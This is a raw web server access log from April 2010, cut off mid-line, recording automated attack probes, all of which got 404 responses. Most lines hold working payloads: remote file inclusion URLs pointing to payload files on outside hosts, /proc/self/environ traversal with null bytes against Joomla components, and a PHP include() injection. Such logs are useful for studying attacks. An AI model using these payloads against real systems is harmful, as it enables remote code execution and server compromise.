209.216.43.133 - - [23/Apr/2010:12:48:00 -0500] "GET /logs/access_log.1219449600/includes/useragent.inc.php?prefix=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:12:48:00 -0500] "GET /logs/includes/useragent.inc.php?prefix=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:12:48:07 -0500] "GET /includes/useragent.inc.php?prefix=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 310 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:12:48:07 -0500] "GET /logs/includes/useragent.inc.php?prefix=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 315 "-""Mozilla/5.0"
209.216.43.133 - - [23/Apr/2010:12:48:07 -0500] "GET /logs/access_log.1219449600/includes/useragent.inc.php?prefix=http://www.berlinbiennale.de//administrator/components/com_poll/..../id1.txt? HTTP/1.1" 404 337 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:49:12 -0500] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:49:12 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:49:12 -0500] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:50:27 -0500] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:50:27 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:12:50:27 -0500] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
88.217.241.187 - - [23/Apr/2010:12:53:12 -0500] "GET /logs/access_log.1268611200//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
88.217.241.187 - - [23/Apr/2010:12:53:12 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.813"
88.217.241.187 - - [23/Apr/2010:12:53:12 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.813"
88.217.241.187 - - [23/Apr/2010:12:53:44 -0500] "GET /logs/access_log.1219363200//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.813"
216.38.50.186 - - [23/Apr/2010:12:53:47 -0500] "GET /logs/access_log.1268611200//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
216.38.50.186 - - [23/Apr/2010:12:53:47 -0500] "GET //index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
216.38.50.186 - - [23/Apr/2010:12:53:47 -0500] "GET /logs//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
207.46.204.186 - - [23/Apr/2010:12:54:25 -0500] "GET /logs/access_log.1194739200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
212.241.177.123 - - [23/Apr/2010:12:54:47 -0500] "GET /logs//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 360 "-""Mozilla/5.0"
212.241.177.123 - - [23/Apr/2010:12:54:47 -0500] "GET /logs/access_log.1270684800//administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 382 "-""Mozilla/5.0"
212.241.177.123 - - [23/Apr/2010:12:54:47 -0500] "GET //administrator/components/com_universal/includes/config/config.html.php?mosConfig_absolute_path=http://www.miranda.gov.ve/modules/mod_sections/tmpl/main??? HTTP/1.1" 404 355 "-""Mozilla/5.0"
216.38.50.186 - - [23/Apr/2010:12:54:52 -0500] "GET /logs/access_log.1219363200//index.php?option=com_rwcards&view=rwcards&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
207.46.199.190 - - [23/Apr/2010:12:58:44 -0500] "GET /robots.txt HTTP/1.1" 404 294 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
75.126.28.140 - - [23/Apr/2010:12:59:00 -0500] "GET /components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 330 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:12:59:00 -0500] "GET /logs/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 335 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:12:59:00 -0500] "GET /logs/access_log.1268611200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:12:59:16 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:12:59:16 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:12:59:16 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
75.126.28.140 - - [23/Apr/2010:12:59:28 -0500] "GET /logs/access_log.1219363200/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:12:59:36 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:12:59:36 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:12:59:36 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:00:38 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:00:38 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:00:38 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
70.38.11.201 - - [23/Apr/2010:13:01:23 -0500] "GET //cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 302 "-""Mozilla/5.0"
70.38.11.201 - - [23/Apr/2010:13:01:23 -0500] "GET /logs//cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 307 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:13:01:26 -0500] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:13:01:26 -0500] "GET /logs/access_log.1219363200%20%20/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 323 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:13:01:26 -0500] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:13:01:45 -0500] "GET /logs/access_log.1219363200/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:13:01:45 -0500] "GET /errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 294 "-""Mozilla/5.0"
174.132.26.98 - - [23/Apr/2010:13:01:45 -0500] "GET /logs/errors.php?error=http://nic.bupt.edu.cn/media/j1.txt?? HTTP/1.1" 404 299 "-""Mozilla/5.0"
70.38.11.201 - - [23/Apr/2010:13:02:21 -0500] "GET /logs/access_log.1263859200//cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
70.38.11.201 - - [23/Apr/2010:13:02:38 -0500] "GET /logs/access_log.1212451200//cnt/user_stat.php?DDum=28&MDum=4&YDum=2008%20%20//bookmark4u/lostpasswd.php?env[include_prefix]=http://dtrplasticos.com.br/components/com_wrapper/grey-40.gif?? HTTP/1.1" 404 329 "-""Mozilla/5.0"
91.186.30.11 - - [23/Apr/2010:13:04:57 -0500] "GET /logs/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:13:04:57 -0500] "GET /logs/access_log.1264982400/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:13:04:57 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:13:04:57 -0500] "GET /logs/access_log.1264723200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:13:05:13 -0500] "GET /logs/access_log.1263859200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:13:05:13 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.834"
91.186.30.11 - - [23/Apr/2010:13:05:13 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.834"
75.126.28.140 - - [23/Apr/2010:13:05:36 -0500] "GET /logs/access_log.1212969600/components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://jack.tiscali.it/hitech/fotocamere/.bash/id1.txt?? HTTP/1.1" 404 357 "-""Mozilla/5.0"
91.186.30.11 - - [23/Apr/2010:13:05:38 -0500] "GET /logs/access_log.1262822400//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.834"
76.73.76.166 - - [23/Apr/2010:13:05:41 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:13:05:41 -0500] "GET /logs/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:13:05:41 -0500] "GET /logs/access_log.1264982400/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
62.149.204.115 - - [23/Apr/2010:13:05:52 -0500] "GET /logs/access_log.1264723200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:13:05:52 -0500] "GET /logs/access_log.1264982400/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:13:05:52 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:13:05:52 -0500] "GET /logs/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.805"
76.73.76.166 - - [23/Apr/2010:13:05:56 -0500] "GET /logs/access_log.1264723200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:13:05:56 -0500] "GET /logs/access_log.1263859200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
122.201.73.182 - - [23/Apr/2010:13:06:15 -0500] "GET /logs/access_log.1264982400/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:13:06:15 -0500] "GET /logs/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:13:06:15 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:13:06:15 -0500] "GET /logs/access_log.1263859200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
62.149.204.115 - - [23/Apr/2010:13:06:23 -0500] "GET /logs/access_log.1263859200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:13:06:23 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:13:06:23 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.805"
62.149.204.115 - - [23/Apr/2010:13:06:23 -0500] "GET /logs/access_log.1262822400//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.805"
76.73.76.166 - - [23/Apr/2010:13:06:35 -0500] "GET /logs/access_log.1263859200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:13:06:35 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:13:06:35 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
76.73.76.166 - - [23/Apr/2010:13:06:35 -0500] "GET /logs/access_log.1262563200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
62.149.204.115 - - [23/Apr/2010:13:06:37 -0500] "GET /logs/access_log.1263859200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.805"
76.73.76.166 - - [23/Apr/2010:13:06:43 -0500] "GET /logs/access_log.1262822400//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
122.201.73.182 - - [23/Apr/2010:13:07:18 -0500] "GET /logs/access_log.1264723200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.831"
88.191.94.188 - - [23/Apr/2010:13:07:23 -0500] "GET /logs/access_log.1268611200%20%20//bbs////////good.php?board_skin_path=http://www.sunwoocopyland.com//data/file/gallery/id1.txt?????????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:13:07:23 -0500] "GET /logs//bbs////////good.php?board_skin_path=http://www.sunwoocopyland.com//data/file/gallery/id1.txt?????????????? HTTP/1.1" 404 309 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:13:07:23 -0500] "GET //bbs////////good.php?board_skin_path=http://www.sunwoocopyland.com//data/file/gallery/id1.txt?????????????? HTTP/1.1" 404 304 "-""Mozilla/5.0"
88.191.94.188 - - [23/Apr/2010:13:07:30 -0500] "GET /logs/access_log.1270684800%20%20//bbs////////good.php?board_skin_path=http://www.sunwoocopyland.com//data/file/gallery/id1.txt?????????????? HTTP/1.1" 404 333 "-""Mozilla/5.0"
88.148.8.7 - - [23/Apr/2010:13:08:22 -0500] "GET /logs/access_log.1264982400/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:13:08:22 -0500] "GET /index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 293 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:13:08:22 -0500] "GET /logs/access_log.1264723200/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 320 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:13:08:22 -0500] "GET /logs/index.php?option=com_clickheat&controller=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 298 "-""libwww-perl/5.810"
122.201.73.182 - - [23/Apr/2010:13:08:32 -0500] "GET /logs/access_log.1263859200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:13:08:32 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:13:08:32 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.831"
122.201.73.182 - - [23/Apr/2010:13:08:32 -0500] "GET /logs/access_log.1262563200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
88.148.8.7 - - [23/Apr/2010:13:08:34 -0500] "GET /logs/access_log.1262822400//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:13:08:34 -0500] "GET //index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 294 "-""libwww-perl/5.810"
88.148.8.7 - - [23/Apr/2010:13:08:34 -0500] "GET /logs//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 299 "-""libwww-perl/5.810"
122.201.73.182 - - [23/Apr/2010:13:08:52 -0500] "GET /logs/access_log.1262822400//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.831"
88.148.8.7 - - [23/Apr/2010:13:09:00 -0500] "GET /logs/access_log.1263859200//index.php?option=com_projectfork§ion=../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 321 "-""libwww-perl/5.810"
124.49.100.254 - - [23/Apr/2010:13:12:09 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:09 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:09 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:12 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:12 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:12 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:15 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:15 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:15 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:37 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:37 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:12:37 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://www.kangnung.org//zb//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:13:41 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:13:41 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:13:41 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
207.46.195.227 - - [23/Apr/2010:13:14:55 -0500] "GET /logs/access_log.1167091200 HTTP/1.1" 404 310 "-""msnbot/2.0b (+http://search.msn.com/msnbot.htm)"
124.49.100.254 - - [23/Apr/2010:13:15:08 -0500] "GET /logs/access_log.1262476800//skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 343 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:15:08 -0500] "GET /logs//skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 321 "-""Mozilla/5.0"
124.49.100.254 - - [23/Apr/2010:13:15:08 -0500] "GET //skin/zero_vote/ask_password.php?dir=http://danangportvn.com:32000//Ckrid1.txt?? HTTP/1.1" 404 316 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:15:46 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:15:46 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:15:46 -0500] "GET /logs/access_log.1268956800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:15:54 -0500] "GET //comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 297 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:15:54 -0500] "GET /logs//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 302 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:15:54 -0500] "GET /logs/access_log.1268956800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 326 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:16:03 -0500] "GET /logs/access_log.1270684800//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://www.diakonia-jkt.sch.id/sk/image_galeri/a4DAc8C2___CIMG1122.jpg??? HTTP/1.1" 404 324 "-""Mozilla/5.0"
121.254.228.21 - - [23/Apr/2010:13:16:06 -0500] "GET /logs/access_log.1270684800%20%2